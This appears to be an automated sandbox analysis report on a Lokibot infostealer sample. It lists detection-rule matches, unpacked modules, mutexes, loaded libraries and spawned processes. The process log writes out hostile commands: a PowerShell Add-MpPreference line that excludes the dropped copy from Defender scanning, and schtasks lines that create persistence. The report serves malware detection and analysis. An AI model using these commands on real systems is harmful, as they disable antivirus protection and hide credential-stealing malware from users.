                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: gunzipped.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: mPvIOxEZXJsdYp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, hn0STnT66964Vkc389.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, hn0STnT66964Vkc389.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.gunzipped.exe.2fb41d0.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 0.2.gunzipped.exe.5870000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 0.2.gunzipped.exe.2d9ef0c.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 0.2.gunzipped.exe.2d8eb6c.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/13@0/1
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeCode function: 13_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,13_2_0040434D
                      Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeMutant created: \Sessions\1\BaseNamedObjects\lHNpfb
                      Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Local\Temp\tmp510D.tmpJump to behavior
                      Source: gunzipped.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: gunzipped.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                      Source: C:\Users\user\Desktop\gunzipped.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: mPvIOxEZXJsdYp.exe.0.drBinary or memory string: UPDATE [AdventureWorksLT2008R2].[SalesLT].[Customer] SET FirstName = @firstName, LastName = @lastName, EmailAddress = @emailAddress, Title = @title, MiddleName = @middleName, Suffix = @suffix, CompanyName = @companyName, SalesPerson = @salesPerson, Phone = @phone, PasswordHash = @passwordHash, PasswordSalt = @passwordSalt, rowguid = @rowguid WHERE CustomerID = @CustomerID;SELECT * FROM [AdventureWorksLT2008R2].[SalesLT].[Customer] WHERE CustomerId = @CustomerID
                      Source: gunzipped.exeVirustotal: Detection: 32%
                      Source: C:\Users\user\Desktop\gunzipped.exeFile read: C:\Users\user\Desktop\gunzipped.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: profapi.dllJump to behavior
